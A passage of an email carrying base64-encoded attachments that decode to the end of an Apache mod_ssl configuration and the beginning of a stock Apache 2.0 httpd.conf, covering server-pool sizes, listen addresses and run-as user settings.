b2FjaCBpcyB0aGF0IG1vZF9zc2wgc2VuZHMgdGhlIGNsb3NlIG5vdGlmeSBh
bGVydCBidXQgZG9lc24ndCB3YWl0IGZvcg0KIyAgIHRoZSBjbG9zZSBub3Rp
ZnkgYWxlcnQgZnJvbSBjbGllbnQuIFdoZW4geW91IG5lZWQgYSBkaWZmZXJl
bnQgc2h1dGRvd24NCiMgICBhcHByb2FjaCB5b3UgY2FuIHVzZSBvbmUgb2Yg
dGhlIGZvbGxvd2luZyB2YXJpYWJsZXM6DQojICAgbyBzc2wtdW5jbGVhbi1z
aHV0ZG93bjoNCiMgICAgIFRoaXMgZm9yY2VzIGFuIHVuY2xlYW4gc2h1dGRv
d24gd2hlbiB0aGUgY29ubmVjdGlvbiBpcyBjbG9zZWQsIGkuZS4gbm8NCiMg
ICAgIFNTTCBjbG9zZSBub3RpZnkgYWxlcnQgaXMgc2VuZCBvciBhbGxvd2Vk
IHRvIHJlY2VpdmVkLiAgVGhpcyB2aW9sYXRlcw0KIyAgICAgdGhlIFNTTC9U
TFMgc3RhbmRhcmQgYnV0IGlzIG5lZWRlZCBmb3Igc29tZSBicmFpbi1kZWFk
IGJyb3dzZXJzLiBVc2UNCiMgICAgIHRoaXMgd2hlbiB5b3UgcmVjZWl2ZSBJ
L08gZXJyb3JzIGJlY2F1c2Ugb2YgdGhlIHN0YW5kYXJkIGFwcHJvYWNoIHdo
ZXJlDQojICAgICBtb2Rfc3NsIHNlbmRzIHRoZSBjbG9zZSBub3RpZnkgYWxl
cnQuDQojICAgbyBzc2wtYWNjdXJhdGUtc2h1dGRvd246DQojICAgICBUaGlz
IGZvcmNlcyBhbiBhY2N1cmF0ZSBzaHV0ZG93biB3aGVuIHRoZSBjb25uZWN0
aW9uIGlzIGNsb3NlZCwgaS5lLiBhDQojICAgICBTU0wgY2xvc2Ugbm90aWZ5
IGFsZXJ0IGlzIHNlbmQgYW5kIG1vZF9zc2wgd2FpdHMgZm9yIHRoZSBjbG9z
ZSBub3RpZnkNCiMgICAgIGFsZXJ0IG9mIHRoZSBjbGllbnQuIFRoaXMgaXMg
MTAwJSBTU0wvVExTIHN0YW5kYXJkIGNvbXBsaWFudCwgYnV0IGluDQojICAg
ICBwcmFjdGljZSBvZnRlbiBjYXVzZXMgaGFuZ2luZyBjb25uZWN0aW9ucyB3
aXRoIGJyYWluLWRlYWQgYnJvd3NlcnMuIFVzZQ0KIyAgICAgdGhpcyBvbmx5
IGZvciBicm93c2VycyB3aGVyZSB5b3Uga25vdyB0aGF0IHRoZWlyIFNTTCBp
bXBsZW1lbnRhdGlvbg0KIyAgICAgd29ya3MgY29ycmVjdGx5LiANCiMgICBO
b3RpY2U6IE1vc3QgcHJvYmxlbXMgb2YgYnJva2VuIGNsaWVudHMgYXJlIGFs
c28gcmVsYXRlZCB0byB0aGUgSFRUUA0KIyAgIGtlZXAtYWxpdmUgZmFjaWxp
dHksIHNvIHlvdSB1c3VhbGx5IGFkZGl0aW9uYWxseSB3YW50IHRvIGRpc2Fi
bGUNCiMgICBrZWVwLWFsaXZlIGZvciB0aG9zZSBjbGllbnRzLCB0b28uIFVz
ZSB2YXJpYWJsZSAibm9rZWVwYWxpdmUiIGZvciB0aGlzLg0KIyAgIFNpbWls
YXJseSwgb25lIGhhcyB0byBmb3JjZSBzb21lIGNsaWVudHMgdG8gdXNlIEhU
VFAvMS4wIHRvIHdvcmthcm91bmQNCiMgICB0aGVpciBicm9rZW4gSFRUUC8x
LjEgaW1wbGVtZW50YXRpb24uIFVzZSB2YXJpYWJsZXMgImRvd25ncmFkZS0x
LjAiIGFuZA0KIyAgICJmb3JjZS1yZXNwb25zZS0xLjAiIGZvciB0aGlzLg0K
U2V0RW52SWYgVXNlci1BZ2VudCAiLipNU0lFLioiIFwNCiAgICAgICAgIG5v
a2VlcGFsaXZlIHNzbC11bmNsZWFuLXNodXRkb3duIFwNCiAgICAgICAgIGRv
d25ncmFkZS0xLjAgZm9yY2UtcmVzcG9uc2UtMS4wDQoNCiMgICBQZXItU2Vy
dmVyIExvZ2dpbmc6DQojICAgVGhlIGhvbWUgb2YgYSBjdXN0b20gU1NMIGxv
ZyBmaWxlLiBVc2UgdGhpcyB3aGVuIHlvdSB3YW50IGENCiMgICBjb21wYWN0
IG5vbi1lcnJvciBTU0wgbG9nZmlsZSBvbiBhIHZpcnR1YWwgaG9zdCBiYXNp
cy4NCkN1c3RvbUxvZyBsb2dzL3NzbF9yZXF1ZXN0X2xvZyBcDQogICAgICAg
ICAgIiV0ICVoICV7U1NMX1BST1RPQ09MfXggJXtTU0xfQ0lQSEVSfXggXCIl
clwiICViIg0KDQo8L1ZpcnR1YWxIb3N0PiAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICANCg0KPC9JZkRlZmluZT4NCg0K
---1463811583-1654559762-1030994767=:1434
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="httpd.conf"
Content-ID: 
Content-Description: 
Content-Disposition: attachment; filename="httpd.conf"
Content-Transfer-Encoding: BASE64

Iw0KIyBCYXNlZCB1cG9uIHRoZSBOQ1NBIHNlcnZlciBjb25maWd1cmF0aW9u
IGZpbGVzIG9yaWdpbmFsbHkgYnkgUm9iIE1jQ29vbC4NCiMNCiMgVGhpcyBp
cyB0aGUgbWFpbiBBcGFjaGUgc2VydmVyIGNvbmZpZ3VyYXRpb24gZmlsZS4g
IEl0IGNvbnRhaW5zIHRoZQ0KIyBjb25maWd1cmF0aW9uIGRpcmVjdGl2ZXMg
dGhhdCBnaXZlIHRoZSBzZXJ2ZXIgaXRzIGluc3RydWN0aW9ucy4NCiMgU2Vl
IDxVUkw6aHR0cDovL2h0dHBkLmFwYWNoZS5vcmcvZG9jcy0yLjAvPiBmb3Ig
ZGV0YWlsZWQgaW5mb3JtYXRpb24gYWJvdXQNCiMgdGhlIGRpcmVjdGl2ZXMu
DQojDQojIERvIE5PVCBzaW1wbHkgcmVhZCB0aGUgaW5zdHJ1Y3Rpb25zIGlu
IGhlcmUgd2l0aG91dCB1bmRlcnN0YW5kaW5nDQojIHdoYXQgdGhleSBkby4g
IFRoZXkncmUgaGVyZSBvbmx5IGFzIGhpbnRzIG9yIHJlbWluZGVycy4gIElm
IHlvdSBhcmUgdW5zdXJlDQojIGNvbnN1bHQgdGhlIG9ubGluZSBkb2NzLiBZ
b3UgaGF2ZSBiZWVuIHdhcm5lZC4gIA0KIw0KIyBUaGUgY29uZmlndXJhdGlv
biBkaXJlY3RpdmVzIGFyZSBncm91cGVkIGludG8gdGhyZWUgYmFzaWMgc2Vj
dGlvbnM6DQojICAxLiBEaXJlY3RpdmVzIHRoYXQgY29udHJvbCB0aGUgb3Bl
cmF0aW9uIG9mIHRoZSBBcGFjaGUgc2VydmVyIHByb2Nlc3MgYXMgYQ0KIyAg
ICAgd2hvbGUgKHRoZSAnZ2xvYmFsIGVudmlyb25tZW50JykuDQojICAyLiBE
aXJlY3RpdmVzIHRoYXQgZGVmaW5lIHRoZSBwYXJhbWV0ZXJzIG9mIHRoZSAn
bWFpbicgb3IgJ2RlZmF1bHQnIHNlcnZlciwNCiMgICAgIHdoaWNoIHJlc3Bv
bmRzIHRvIHJlcXVlc3RzIHRoYXQgYXJlbid0IGhhbmRsZWQgYnkgYSB2aXJ0
dWFsIGhvc3QuDQojICAgICBUaGVzZSBkaXJlY3RpdmVzIGFsc28gcHJvdmlk
ZSBkZWZhdWx0IHZhbHVlcyBmb3IgdGhlIHNldHRpbmdzDQojICAgICBvZiBh
bGwgdmlydHVhbCBob3N0cy4NCiMgIDMuIFNldHRpbmdzIGZvciB2aXJ0dWFs
IGhvc3RzLCB3aGljaCBhbGxvdyBXZWIgcmVxdWVzdHMgdG8gYmUgc2VudCB0
bw0KIyAgICAgZGlmZmVyZW50IElQIGFkZHJlc3NlcyBvciBob3N0bmFtZXMg
YW5kIGhhdmUgdGhlbSBoYW5kbGVkIGJ5IHRoZQ0KIyAgICAgc2FtZSBBcGFj
aGUgc2VydmVyIHByb2Nlc3MuDQojDQojIENvbmZpZ3VyYXRpb24gYW5kIGxv
Z2ZpbGUgbmFtZXM6IElmIHRoZSBmaWxlbmFtZXMgeW91IHNwZWNpZnkgZm9y
IG1hbnkNCiMgb2YgdGhlIHNlcnZlcidzIGNvbnRyb2wgZmlsZXMgYmVnaW4g
d2l0aCAiLyIgKG9yICJkcml2ZTovIiBmb3IgV2luMzIpLCB0aGUNCiMgc2Vy
dmVyIHdpbGwgdXNlIHRoYXQgZXhwbGljaXQgcGF0aC4gIElmIHRoZSBmaWxl
bmFtZXMgZG8gKm5vdCogYmVnaW4NCiMgd2l0aCAiLyIsIHRoZSB2YWx1ZSBv
ZiBTZXJ2ZXJSb290IGlzIHByZXBlbmRlZCAtLSBzbyAibG9ncy9mb28ubG9n
Ig0KIyB3aXRoIFNlcnZlclJvb3Qgc2V0IHRvICIvdXNyL2xvY2FsIiB3aWxs
IGJlIGludGVycHJldGVkIGJ5IHRoZQ0KIyBzZXJ2ZXIgYXMgIi91c3IvbG9j
YWwvbG9ncy9mb28ubG9nIi4NCiMNCg0KIyMjIFNlY3Rpb24gMTogR2xvYmFs
IEVudmlyb25tZW50DQojDQojIFRoZSBkaXJlY3RpdmVzIGluIHRoaXMgc2Vj
dGlvbiBhZmZlY3QgdGhlIG92ZXJhbGwgb3BlcmF0aW9uIG9mIEFwYWNoZSwN
CiMgc3VjaCBhcyB0aGUgbnVtYmVyIG9mIGNvbmN1cnJlbnQgcmVxdWVzdHMg
aXQgY2FuIGhhbmRsZSBvciB3aGVyZSBpdA0KIyBjYW4gZmluZCBpdHMgY29u
ZmlndXJhdGlvbiBmaWxlcy4NCiMNCg0KIw0KIyBTZXJ2ZXJSb290OiBUaGUg
dG9wIG9mIHRoZSBkaXJlY3RvcnkgdHJlZSB1bmRlciB3aGljaCB0aGUgc2Vy
dmVyJ3MNCiMgY29uZmlndXJhdGlvbiwgZXJyb3IsIGFuZCBsb2cgZmlsZXMg
YXJlIGtlcHQuDQojDQojIE5PVEUhICBJZiB5b3UgaW50ZW5kIHRvIHBsYWNl
IHRoaXMgb24gYW4gTkZTIChvciBvdGhlcndpc2UgbmV0d29yaykNCiMgbW91
bnRlZCBmaWxlc3lzdGVtIHRoZW4gcGxlYXNlIHJlYWQgdGhlIExvY2tGaWxl
IGRvY3VtZW50YXRpb24NCiMgKGF2YWlsYWJsZSBhdCA8VVJMOmh0dHA6Ly9o
dHRwZC5hcGFjaGUub3JnL2RvY3MtMi4wL21vZC9jb3JlLmh0bWwjbG9ja2Zp
bGU+KTsNCiMgeW91IHdpbGwgc2F2ZSB5b3Vyc2VsZiBhIGxvdCBvZiB0cm91
YmxlLg0KIw0KIyBEbyBOT1QgYWRkIGEgc2xhc2ggYXQgdGhlIGVuZCBvZiB0
aGUgZGlyZWN0b3J5IHBhdGguDQojDQpTZXJ2ZXJSb290ICIvdXNyL2xvY2Fs
Ig0KDQojDQojIFRoZSBhY2NlcHQgc2VyaWFsaXphdGlvbiBsb2NrIGZpbGUg
TVVTVCBCRSBTVE9SRUQgT04gQSBMT0NBTCBESVNLLg0KIw0KPElmTW9kdWxl
ICFtcG1fd2lubnQuYz4NCjxJZk1vZHVsZSAhbXBtX25ldHdhcmUuYz4NCiNM
b2NrRmlsZSBsb2dzL2FjY2VwdC5sb2NrDQo8L0lmTW9kdWxlPg0KPC9JZk1v
ZHVsZT4NCg0KIw0KIyBTY29yZUJvYXJkRmlsZTogRmlsZSB1c2VkIHRvIHN0
b3JlIGludGVybmFsIHNlcnZlciBwcm9jZXNzIGluZm9ybWF0aW9uLg0KIyBJ
ZiB1bnNwZWNpZmllZCAodGhlIGRlZmF1bHQpLCB0aGUgc2NvcmVib2FyZCB3
aWxsIGJlIHN0b3JlZCBpbiBhbg0KIyBhbm9ueW1vdXMgc2hhcmVkIG1lbW9y
eSBzZWdtZW50LCBhbmQgd2lsbCBiZSB1bmF2YWlsYWJsZSB0byB0aGlyZC1w
YXJ0eQ0KIyBhcHBsaWNhdGlvbnMuDQojIElmIHNwZWNpZmllZCwgZW5zdXJl
IHRoYXQgbm8gdHdvIGludm9jYXRpb25zIG9mIEFwYWNoZSBzaGFyZSB0aGUg
c2FtZQ0KIyBzY29yZWJvYXJkIGZpbGUuIFRoZSBzY29yZWJvYXJkIGZpbGUg
TVVTVCBCRSBTVE9SRUQgT04gQSBMT0NBTCBESVNLLg0KIw0KPElmTW9kdWxl
ICFtcG1fbmV0d2FyZS5jPg0KPElmTW9kdWxlICFwZXJjaGlsZC5jPg0KI1Nj
b3JlQm9hcmRGaWxlIGxvZ3MvYXBhY2hlX3J1bnRpbWVfc3RhdHVzDQo8L0lm
TW9kdWxlPg0KPC9JZk1vZHVsZT4NCg0KDQojDQojIFBpZEZpbGU6IFRoZSBm
aWxlIGluIHdoaWNoIHRoZSBzZXJ2ZXIgc2hvdWxkIHJlY29yZCBpdHMgcHJv
Y2Vzcw0KIyBpZGVudGlmaWNhdGlvbiBudW1iZXIgd2hlbiBpdCBzdGFydHMu
DQojDQo8SWZNb2R1bGUgIW1wbV9uZXR3YXJlLmM+DQpQaWRGaWxlIGxvZ3Mv
aHR0cGQucGlkDQo8L0lmTW9kdWxlPg0KDQojDQojIFRpbWVvdXQ6IFRoZSBu
dW1iZXIgb2Ygc2Vjb25kcyBiZWZvcmUgcmVjZWl2ZXMgYW5kIHNlbmRzIHRp
bWUgb3V0Lg0KIw0KVGltZW91dCAzMDANCg0KIw0KIyBLZWVwQWxpdmU6IFdo
ZXRoZXIgb3Igbm90IHRvIGFsbG93IHBlcnNpc3RlbnQgY29ubmVjdGlvbnMg
KG1vcmUgdGhhbg0KIyBvbmUgcmVxdWVzdCBwZXIgY29ubmVjdGlvbikuIFNl
dCB0byAiT2ZmIiB0byBkZWFjdGl2YXRlLg0KIw0KS2VlcEFsaXZlIE9uDQoN
CiMNCiMgTWF4S2VlcEFsaXZlUmVxdWVzdHM6IFRoZSBtYXhpbXVtIG51bWJl
ciBvZiByZXF1ZXN0cyB0byBhbGxvdw0KIyBkdXJpbmcgYSBwZXJzaXN0ZW50
IGNvbm5lY3Rpb24uIFNldCB0byAwIHRvIGFsbG93IGFuIHVubGltaXRlZCBh
bW91bnQuDQojIFdlIHJlY29tbWVuZCB5b3UgbGVhdmUgdGhpcyBudW1iZXIg
aGlnaCwgZm9yIG1heGltdW0gcGVyZm9ybWFuY2UuDQojDQpNYXhLZWVwQWxp
dmVSZXF1ZXN0cyAxMDANCg0KIw0KIyBLZWVwQWxpdmVUaW1lb3V0OiBOdW1i
ZXIgb2Ygc2Vjb25kcyB0byB3YWl0IGZvciB0aGUgbmV4dCByZXF1ZXN0IGZy
b20gdGhlDQojIHNhbWUgY2xpZW50IG9uIHRoZSBzYW1lIGNvbm5lY3Rpb24u
DQojDQpLZWVwQWxpdmVUaW1lb3V0IDE1DQoNCiMjDQojIyBTZXJ2ZXItUG9v
bCBTaXplIFJlZ3VsYXRpb24gKE1QTSBzcGVjaWZpYykNCiMjIA0KDQojIHBy
ZWZvcmsgTVBNDQojIFN0YXJ0U2VydmVyczogbnVtYmVyIG9mIHNlcnZlciBw
cm9jZXNzZXMgdG8gc3RhcnQNCiMgTWluU3BhcmVTZXJ2ZXJzOiBtaW5pbXVt
IG51bWJlciBvZiBzZXJ2ZXIgcHJvY2Vzc2VzIHdoaWNoIGFyZSBrZXB0IHNw
YXJlDQojIE1heFNwYXJlU2VydmVyczogbWF4aW11bSBudW1iZXIgb2Ygc2Vy
dmVyIHByb2Nlc3NlcyB3aGljaCBhcmUga2VwdCBzcGFyZQ0KIyBNYXhDbGll
bnRzOiBtYXhpbXVtIG51bWJlciBvZiBzZXJ2ZXIgcHJvY2Vzc2VzIGFsbG93
ZWQgdG8gc3RhcnQNCiMgTWF4UmVxdWVzdHNQZXJDaGlsZDogbWF4aW11bSBu
dW1iZXIgb2YgcmVxdWVzdHMgYSBzZXJ2ZXIgcHJvY2VzcyBzZXJ2ZXMNCjxJ
Zk1vZHVsZSBwcmVmb3JrLmM+DQpTdGFydFNlcnZlcnMgICAgICAgICA1DQpN
aW5TcGFyZVNlcnZlcnMgICAgICA1DQpNYXhTcGFyZVNlcnZlcnMgICAgIDEw
DQpNYXhDbGllbnRzICAgICAgICAgMTUwDQpNYXhSZXF1ZXN0c1BlckNoaWxk
ICAwDQo8L0lmTW9kdWxlPg0KDQojIHdvcmtlciBNUE0NCiMgU3RhcnRTZXJ2
ZXJzOiBpbml0aWFsIG51bWJlciBvZiBzZXJ2ZXIgcHJvY2Vzc2VzIHRvIHN0
YXJ0DQojIE1heENsaWVudHM6IG1heGltdW0gbnVtYmVyIG9mIHNpbXVsdGFu
ZW91cyBjbGllbnQgY29ubmVjdGlvbnMNCiMgTWluU3BhcmVUaHJlYWRzOiBt
aW5pbXVtIG51bWJlciBvZiB3b3JrZXIgdGhyZWFkcyB3aGljaCBhcmUga2Vw
dCBzcGFyZQ0KIyBNYXhTcGFyZVRocmVhZHM6IG1heGltdW0gbnVtYmVyIG9m
IHdvcmtlciB0aHJlYWRzIHdoaWNoIGFyZSBrZXB0IHNwYXJlDQojIFRocmVh
ZHNQZXJDaGlsZDogY29uc3RhbnQgbnVtYmVyIG9mIHdvcmtlciB0aHJlYWRz
IGluIGVhY2ggc2VydmVyIHByb2Nlc3MNCiMgTWF4UmVxdWVzdHNQZXJDaGls
ZDogbWF4aW11bSBudW1iZXIgb2YgcmVxdWVzdHMgYSBzZXJ2ZXIgcHJvY2Vz
cyBzZXJ2ZXMNCjxJZk1vZHVsZSB3b3JrZXIuYz4NClN0YXJ0U2VydmVycyAg
ICAgICAgIDINCk1heENsaWVudHMgICAgICAgICAxNTANCk1pblNwYXJlVGhy
ZWFkcyAgICAgMjUNCk1heFNwYXJlVGhyZWFkcyAgICAgNzUgDQpUaHJlYWRz
UGVyQ2hpbGQgICAgIDI1DQpNYXhSZXF1ZXN0c1BlckNoaWxkICAwDQo8L0lm
TW9kdWxlPg0KDQojIHBlcmNoaWxkIE1QTQ0KIyBOdW1TZXJ2ZXJzOiBjb25z
dGFudCBudW1iZXIgb2Ygc2VydmVyIHByb2Nlc3Nlcw0KIyBTdGFydFRocmVh
ZHM6IGluaXRpYWwgbnVtYmVyIG9mIHdvcmtlciB0aHJlYWRzIGluIGVhY2gg
c2VydmVyIHByb2Nlc3MNCiMgTWluU3BhcmVUaHJlYWRzOiBtaW5pbXVtIG51
bWJlciBvZiB3b3JrZXIgdGhyZWFkcyB3aGljaCBhcmUga2VwdCBzcGFyZQ0K
IyBNYXhTcGFyZVRocmVhZHM6IG1heGltdW0gbnVtYmVyIG9mIHdvcmtlciB0
aHJlYWRzIHdoaWNoIGFyZSBrZXB0IHNwYXJlDQojIE1heFRocmVhZHNQZXJD
aGlsZDogbWF4aW11bSBudW1iZXIgb2Ygd29ya2VyIHRocmVhZHMgaW4gZWFj
aCBzZXJ2ZXIgcHJvY2Vzcw0KIyBNYXhSZXF1ZXN0c1BlckNoaWxkOiBtYXhp
bXVtIG51bWJlciBvZiBjb25uZWN0aW9ucyBwZXIgc2VydmVyIHByb2Nlc3MN
CjxJZk1vZHVsZSBwZXJjaGlsZC5jPg0KTnVtU2VydmVycyAgICAgICAgICAg
NQ0KU3RhcnRUaHJlYWRzICAgICAgICAgNQ0KTWluU3BhcmVUaHJlYWRzICAg
ICAgNQ0KTWF4U3BhcmVUaHJlYWRzICAgICAxMA0KTWF4VGhyZWFkc1BlckNo
aWxkICAyMA0KTWF4UmVxdWVzdHNQZXJDaGlsZCAgMA0KPC9JZk1vZHVsZT4N
Cg0KIyBXaW5OVCBNUE0NCiMgVGhyZWFkc1BlckNoaWxkOiBjb25zdGFudCBu
dW1iZXIgb2Ygd29ya2VyIHRocmVhZHMgaW4gdGhlIHNlcnZlciBwcm9jZXNz
DQojIE1heFJlcXVlc3RzUGVyQ2hpbGQ6IG1heGltdW0gIG51bWJlciBvZiBy
ZXF1ZXN0cyBhIHNlcnZlciBwcm9jZXNzIHNlcnZlcw0KPElmTW9kdWxlIG1w
bV93aW5udC5jPg0KVGhyZWFkc1BlckNoaWxkIDI1MA0KTWF4UmVxdWVzdHNQ
ZXJDaGlsZCAgMA0KPC9JZk1vZHVsZT4NCg0KIyBCZU9TIE1QTQ0KIyBTdGFy
dFRocmVhZHM6IGhvdyBtYW55IHRocmVhZHMgZG8gd2UgaW5pdGlhbGx5IHNw
YXduPw0KIyBNYXhDbGllbnRzOiAgIG1heCBudW1iZXIgb2YgdGhyZWFkcyB3
ZSBjYW4gaGF2ZSAoMSB0aHJlYWQgPT0gMSBjbGllbnQpDQojIE1heFJlcXVl
c3RzUGVyVGhyZWFkOiBtYXhpbXVtIG51bWJlciBvZiByZXF1ZXN0cyBlYWNo
IHRocmVhZCB3aWxsIHByb2Nlc3MNCjxJZk1vZHVsZSBiZW9zLmM+DQpTdGFy
dFRocmVhZHMgICAgICAgICAgICAgICAxMA0KTWF4Q2xpZW50cyAgICAgICAg
ICAgICAgICAgNTANCk1heFJlcXVlc3RzUGVyVGhyZWFkICAgICAgIDEwMDAw
DQo8L0lmTW9kdWxlPiAgICANCg0KIyBOZXRXYXJlIE1QTQ0KIyBUaHJlYWRT
dGFja1NpemUgLi4uLi4uIFN0YWNrIHNpemUgYWxsb2NhdGVkIGZvciBlYWNo
IHdvcmtlciB0aHJlYWQNCiMgU3RhcnRUaHJlYWRzIC4uLi4uLi4uLiBOdW1i
ZXIgb2Ygd29ya2VyIHRocmVhZHMgbGF1bmNoZWQgYXQgc2VydmVyIHN0YXJ0
dXANCiMgTWluU3BhcmVUaHJlYWRzIC4uLi4uLiBNaW5pbXVtIG51bWJlciBv
ZiBpZGxlIHRocmVhZHMsIHRvIGhhbmRsZSByZXF1ZXN0IHNwaWtlcw0KIyBN
YXhTcGFyZVRocmVhZHMgLi4uLi4uIE1heGltdW0gbnVtYmVyIG9mIGlkbGUg
dGhyZWFkcw0KIyBNYXhUaHJlYWRzIC4uLi4uLi4uLi4uIE1heGltdW0gbnVt
YmVyIG9mIHdvcmtlciB0aHJlYWRzIGFsaXZlIGF0IHRoZSBzYW1lIHRpbWUN
CiMgTWF4UmVxdWVzdHNQZXJDaGlsZCAuLiBNYXhpbXVtICBudW1iZXIgb2Yg
cmVxdWVzdHMgYSB0aHJlYWQgc2VydmVzLiBJdCBpcyANCiMgICAgICAgICAg
ICAgICAgICAgICAgICAgcmVjb21tZW5kZWQgdGhhdCB0aGUgZGVmYXVsdCB2
YWx1ZSBvZiAwIGJlIHNldCBmb3IgdGhpcw0KIyAgICAgICAgICAgICAgICAg
ICAgICAgICBkaXJlY3RpdmUgb24gTmV0V2FyZS4gIFRoaXMgd2lsbCBhbGxv
dyB0aGUgdGhyZWFkIHRvIA0KIyAgICAgICAgICAgICAgICAgICAgICAgICBj
b250aW51ZSB0byBzZXJ2aWNlIHJlcXVlc3RzIGluZGVmaW5pdGVseS4gICAg
ICAgICAgICAgICAgICAgICAgICAgIA0KPElmTW9kdWxlIG1wbV9uZXR3YXJl
LmM+DQpUaHJlYWRTdGFja1NpemUgICAgICA2NTUzNg0KU3RhcnRUaHJlYWRz
ICAgICAgICAgICAyNTANCk1pblNwYXJlVGhyZWFkcyAgICAgICAgIDI1DQpN
YXhTcGFyZVRocmVhZHMgICAgICAgIDI1MA0KTWF4VGhyZWFkcyAgICAgICAg
ICAgIDEwMDANCk1heFJlcXVlc3RzUGVyQ2hpbGQgICAgICAwDQo8L0lmTW9k
dWxlPg0KDQojDQojIExpc3RlbjogQWxsb3dzIHlvdSB0byBiaW5kIEFwYWNo
ZSB0byBzcGVjaWZpYyBJUCBhZGRyZXNzZXMgYW5kL29yDQojIHBvcnRzLCBp
biBhZGRpdGlvbiB0byB0aGUgZGVmYXVsdC4gU2VlIGFsc28gdGhlIDxWaXJ0
dWFsSG9zdD4NCiMgZGlyZWN0aXZlLg0KIw0KIyBDaGFuZ2UgdGhpcyB0byBM
aXN0ZW4gb24gc3BlY2lmaWMgSVAgYWRkcmVzc2VzIGFzIHNob3duIGJlbG93
IHRvIA0KIyBwcmV2ZW50IEFwYWNoZSBmcm9tIGdsb21taW5nIG9udG8gYWxs
IGJvdW5kIElQIGFkZHJlc3NlcyAoMC4wLjAuMCkNCiMNCiNMaXN0ZW4gMTIu
MzQuNTYuNzg6ODANCkxpc3RlbiAyMDYuMjUzLjE5NS4yMTA6ODANCkxpc3Rl
biA2NC4xMzMuMjU0Ljc4OjgwDQpMaXN0ZW4gMTAuMTAuMTAuMTAwOjgwDQpM
aXN0ZW4gMTI3LjAuMC4xOjgwDQoNCiMNCiMgRHluYW1pYyBTaGFyZWQgT2Jq
ZWN0IChEU08pIFN1cHBvcnQNCiMNCiMgVG8gYmUgYWJsZSB0byB1c2UgdGhl
IGZ1bmN0aW9uYWxpdHkgb2YgYSBtb2R1bGUgd2hpY2ggd2FzIGJ1aWx0IGFz
IGEgRFNPIHlvdQ0KIyBoYXZlIHRvIHBsYWNlIGNvcnJlc3BvbmRpbmcgYExv
YWRNb2R1bGUnIGxpbmVzIGF0IHRoaXMgbG9jYXRpb24gc28gdGhlDQojIGRp
cmVjdGl2ZXMgY29udGFpbmVkIGluIGl0IGFyZSBhY3R1YWxseSBhdmFpbGFi
bGUgX2JlZm9yZV8gdGhleSBhcmUgdXNlZC4NCiMgU3RhdGljYWxseSBjb21w
aWxlZCBtb2R1bGVzICh0aG9zZSBsaXN0ZWQgYnkgYGh0dHBkIC1sJykgZG8g
bm90IG5lZWQNCiMgdG8gYmUgbG9hZGVkIGhlcmUuDQojDQojIEV4YW1wbGU6
DQojIExvYWRNb2R1bGUgZm9vX21vZHVsZSBtb2R1bGVzL21vZF9mb28uc28N
CiMNCg0KIw0KIyBFeHRlbmRlZFN0YXR1cyBjb250cm9scyB3aGV0aGVyIEFw
YWNoZSB3aWxsIGdlbmVyYXRlICJmdWxsIiBzdGF0dXMNCiMgaW5mb3JtYXRp
b24gKEV4dGVuZGVkU3RhdHVzIE9uKSBvciBqdXN0IGJhc2ljIGluZm9ybWF0
aW9uIChFeHRlbmRlZFN0YXR1cw0KIyBPZmYpIHdoZW4gdGhlICJzZXJ2ZXIt
c3RhdHVzIiBoYW5kbGVyIGlzIGNhbGxlZC4gVGhlIGRlZmF1bHQgaXMgT2Zm
Lg0KIw0KRXh0ZW5kZWRTdGF0dXMgT24NCg0KIyMjIFNlY3Rpb24gMjogJ01h
aW4nIHNlcnZlciBjb25maWd1cmF0aW9uDQojDQojIFRoZSBkaXJlY3RpdmVz
IGluIHRoaXMgc2VjdGlvbiBzZXQgdXAgdGhlIHZhbHVlcyB1c2VkIGJ5IHRo
ZSAnbWFpbicNCiMgc2VydmVyLCB3aGljaCByZXNwb25kcyB0byBhbnkgcmVx
dWVzdHMgdGhhdCBhcmVuJ3QgaGFuZGxlZCBieSBhDQojIDxWaXJ0dWFsSG9z
dD4gZGVmaW5pdGlvbi4gIFRoZXNlIHZhbHVlcyBhbHNvIHByb3ZpZGUgZGVm
YXVsdHMgZm9yDQojIGFueSA8VmlydHVhbEhvc3Q+IGNvbnRhaW5lcnMgeW91
IG1heSBkZWZpbmUgbGF0ZXIgaW4gdGhlIGZpbGUuDQojDQojIEFsbCBvZiB0
aGVzZSBkaXJlY3RpdmVzIG1heSBhcHBlYXIgaW5zaWRlIDxWaXJ0dWFsSG9z
dD4gY29udGFpbmVycywNCiMgaW4gd2hpY2ggY2FzZSB0aGVzZSBkZWZhdWx0
IHNldHRpbmdzIHdpbGwgYmUgb3ZlcnJpZGRlbiBmb3IgdGhlDQojIHZpcnR1
YWwgaG9zdCBiZWluZyBkZWZpbmVkLg0KIw0KDQo8SWZNb2R1bGUgIW1wbV93
aW5udC5jPg0KPElmTW9kdWxlICFtcG1fbmV0d2FyZS5jPg0KIw0KIyBJZiB5
b3Ugd2lzaCBodHRwZCB0byBydW4gYXMgYSBkaWZmZXJlbnQgdXNlciBvciBn
cm91cCwgeW91IG11c3QgcnVuDQojIGh0dHBkIGFzIHJvb3QgaW5pdGlhbGx5
IGFuZCBpdCB3aWxsIHN3aXRjaC4gIA0KIw0KIyBVc2VyL0dyb3VwOiBUaGUg
bmFtZSAob3IgI251bWJlcikgb2YgdGhlIHVzZXIvZ3JvdXAgdG8gcnVuIGh0
dHBkIGFzLg0KIyAgLiBPbiBTQ08gKE9EVCAzKSB1c2UgIlVzZXIgbm91c2Vy
IiBhbmQgIkdyb3VwIG5vZ3JvdXAiLg0KIyAgLiBPbiBIUFVYIHlvdSBtYXkg
bm90IGJlIGFibGUgdG8gdXNlIHNoYXJlZCBtZW1vcnkgYXMgbm9ib2R5LCBh
bmQgdGhlDQojICAgIHN1Z2dlc3RlZCB3b3JrYXJvdW5kIGlzIHRvIGNyZWF0
ZSBhIHVzZXIgd3d3IGFuZCB1c2UgdGhhdCB1c2VyLg0KIyAgTk9URSB0aGF0
IHNvbWUga2VybmVscyByZWZ1c2UgdG8gc2V0Z2lkKEdyb3VwKSBvciBzZW1j
dGwoSVBDX1NFVCkNCiMgIHdoZW4gdGhlIHZhbHVlIG9mICh1bnNpZ25lZClH
cm91cCBpcyBhYm92ZSA2MDAwMDsgDQojICBkb24ndCB1c2UgR3JvdXAgIy0x
IG9uIHRoZXNlIHN5c3RlbXMhDQojDQpVc2VyIG5vYm9keQ0KR3JvdXAgIy0x
DQo8L0lmTW9kdWxlPg0KPC9JZk1vZHVsZT4NCg0KIw0KIyBTZXJ2ZXJBZG1p
bjogWW91ciBhZGRyZXNzLCB3aGVyZSBwcm9ibGVtcyB3aXRoIHRoZSBzZXJ2
